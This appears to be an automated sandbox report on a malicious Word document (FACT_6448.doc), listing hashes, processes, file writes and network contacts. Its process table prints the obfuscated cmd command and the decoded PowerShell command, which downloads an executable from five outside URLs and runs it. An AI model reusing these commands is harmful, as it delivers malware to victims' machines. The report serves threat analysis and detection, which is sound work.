File name: | FACT_6448.doc |
Full analysis: | https://app.any.run/tasks/68597eff-4c29-4e61-a5ba-6bacd400d355 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 14:07:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Egor-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 10 19:14:00 2018, Last Saved Time/Date: Mon Sep 10 19:14:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 27, Security: 0 |
MD5: | 22C3DE6E95431DD2B005605FFB46385F |
SHA1: | AD96281BC272F1EC2AE5159616F0DC104405BEB5 |
SHA256: | 21F44598CCE9BF517A61084D4CEB5899CF47E3053A7788F35370F6B75450C30D |
SSDEEP: | 768:opJcaUitGAlmrJpmxlzC+w99NBC+1oeajTiXcnYt3o/6Wl9AHU0CI:optJlmrJpmxlRw99NBC+aeI+cYel9f |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Egor-PC |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:09:10 18:14:00 |
ModifyDate: | 2018:09:10 18:14:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 27 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 30 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FACT_6448.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2204 | cmd /V/C"set ^un= ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^tac};^k^aer^b^;hNQ$ m^e^tI-ek^ovnI;)hNQ^$ ,m^j^a^$(e^li^Fd^a^o^ln^wo^D.VAJ^$^{^yrt^{)^Qa^i^$ n^i^ m^ja^$(^hca^er^o^f;'^ex^e^.'+^z^B^z$+^'^\'^+c^il^b^u^p^:vne^$^=^hN^Q$^;^'0^52^' ^=^ ^z^B^z^$;)^'^@'(^ti^lpS.'E6P^1^J^1Y/^moc.xrsha//:p^tt^h@6VTdyy^x/rb.^m^oc^.t^lucomsoc//:p^tth^@^1CJ^gz^M3^2lf/z^t^.^oc.enil^tn^orf//:^ptth^@v^qj4lNi^W/tne^tn^oc-pw/m^oc^.a^t^in^a^w^gn^atn^e^tle^kitr^a//:^pt^th^@RXcz^3Fx^xS/^moc^.^kivor^ub^.^s^l^oot//^:p^tt^h^'=Q^ai^$;^tn^e^i^lC^b^eW^.teN^ ^tcej^b^o^-^wen=V^AJ^$ l^le^h^sr^e^wo^p&&for /^L %^z ^in (38^7;^-^1^;0)d^o ^s^et 1^e^SX=!1^e^SX!!^un:~%^z,1!&&^if %^z ^e^q^u ^0 c^al^l %1^e^SX:^~-^3^88%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3740 | powershell $JAV=new-object Net.WebClient;$iaQ='http://tools.burovik.com/SxxF3zcXR@http://artikeltentangwanita.com/wp-content/WiNl4jqv@http://frontline.co.tz/fl23MzgJC1@http://cosmocult.com.br/xyydTV6@http://ahsrx.com/Y1J1P6E'.Split('@');$zBz = '250';$QNh=$env:public+'\'+$zBz+'.exe';foreach($ajm in $iaQ){try{$JAV.DownloadFile($ajm, $QNh);Invoke-Item $QNh;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
592 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREDD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NM1H20PTUXAG57R2X1UO.temp | — | |
MD5:— | SHA256:— | |||
592 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs20AF.tmp | — | |
MD5:— | SHA256:— | |||
592 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs20C0.tmp | — | |
MD5:— | SHA256:— | |||
3740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$CT_6448.doc | pgc | |
MD5:C18839F865CA028D63A4B624C418FB89 | SHA256:E3092188E2157814758605963989CAAC3988A7722479301C75DC0E4F634DF9B9 | |||
2896 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5AB8FDB550CEF33A41135907EDACEA21 | SHA256:B313EC3B7731E49E8197F3027D1E9BB7650F7DE250BEC72E876D9FBE7B5D72C8 | |||
3740 | powershell.exe | C:\Users\Public\250.exe | html | |
MD5:056881E1594182BF8D7A9AD50AFD5100 | SHA256:1226AFE8640ED3E71393748E06DE34C57CA0F135E94CCD9F4C11CA4AC4C2D4BD | |||
3740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121b8f.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3740 | powershell.exe | GET | 301 | 195.208.0.100:80 | http://tools.burovik.com/SxxF3zcXR | RU | html | 320 b | malicious |
3740 | powershell.exe | GET | 200 | 31.31.196.134:80 | http://burovik.com/ | RU | html | 31.0 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 31.31.196.134:80 | burovik.com | Domain names registrar REG.RU, Ltd | RU | suspicious |
— | — | 195.208.0.100:80 | tools.burovik.com | Autonomous Non-commercial Organization Regional Network Information Center | RU | malicious |
Domain | IP | Reputation |
---|---|---|
tools.burovik.com |
| malicious |
burovik.com |
| suspicious |